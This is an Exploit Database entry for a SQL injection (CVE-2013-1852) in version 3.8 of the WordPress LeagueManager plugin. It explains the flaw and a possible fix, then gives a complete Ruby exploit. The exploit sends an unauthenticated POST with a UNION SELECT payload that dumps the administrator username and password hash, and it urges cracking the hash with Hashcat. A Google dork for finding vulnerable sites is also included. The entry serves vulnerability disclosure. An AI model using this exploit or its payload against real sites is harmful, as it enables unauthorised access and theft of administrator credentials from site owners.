WordPress Plugin LeagueManager 3.8 – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Joshua Reynolds
  日期： 2013-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24789/

• #!/usr/bin/ruby
  #
  # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
  # Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
  # Date: 13/03/13
  # Exploit Author: Joshua Reynolds
  # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/
  # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip
  # Version: 3.8
  # Tested on: BT5R1 - Ubuntu 10.04.2 LTS
  # CVE: CVE-2013-1852
  #-----------------------------------------------------------------------------------------
  #Description:
  #
  #An SQL Injection vulnerability exists in the league_id parameter of a function call made
  #by the leaguemanager_export page. This request is processed within the leaguemanager.php:
  #
  #if ( isset($_POST['leaguemanager_export']))
  # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
  #
  #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page
  #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
  #when making this call: $this->league = $leaguemanager->getLeague($league_id);
  #The information is then echoed to a CSV file that is then provided.
  #
  #Since no authentication is required when making a POST request to this page, 
  #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established
  #session.
  #
  #Fix:
  #
  #A possible fix for this would be to cast the league_id to an integer during any
  #of the function calls. The following changes can be made in the leaguemanager.php file:
  #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
  #
  #These functions should also not be available to public requests, and thus session handling
  #should also be checked prior to the requests being processed within the admin section.
  #
  #The responsible disclosure processes were distorted by the fact that the author no longer
  #supports his well established plugin, and there are currently no maintainers. After
  #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
  #and not patch the vulnerability.
  #
  #The following ruby exploit will retrieve the administrator username and the salted 
  #password hash from a given site with the plugin installed:
  #------------------------------------------------------------------------------------------
  #Exploit:
  
  require 'net/http'
  require 'uri'
  
  if ARGV.length == 2
  	post_params = {
  		'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
  		'9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
  		'mode' => 'teams',
  		'leaguemanager_export' => 'Download+File'
  	}
  
  	target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"
  	
  	begin
  		resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
  	rescue
  		puts "Invalid URL..."
  	end
  		
  	if resp.nil?
  		print_error "No response received..."
  
  	elsif resp.code != "200"
  		puts "Page doesn't exist!"
  	else	
  		admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
  	
  		if(admin_login.length > 0)
  			puts "Username: #{admin_login[0][0]}"
  			puts "Hash: #{admin_login[0][1]}"
  			puts "\nNow go crack that with Hashcat :)"
  		else
  			puts "Username and hash not received. Maybe it's patched?"
  		end
  	end
  else
  	puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
  end
  
  #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
  #
  #Contact:
  #Mail: infosec4breakfast@gmail.com
  #Blog: infosec4breakfast.com
  #Twitter: @jershmagersh
  #Youtube: youtube.com/user/infosec4breakfast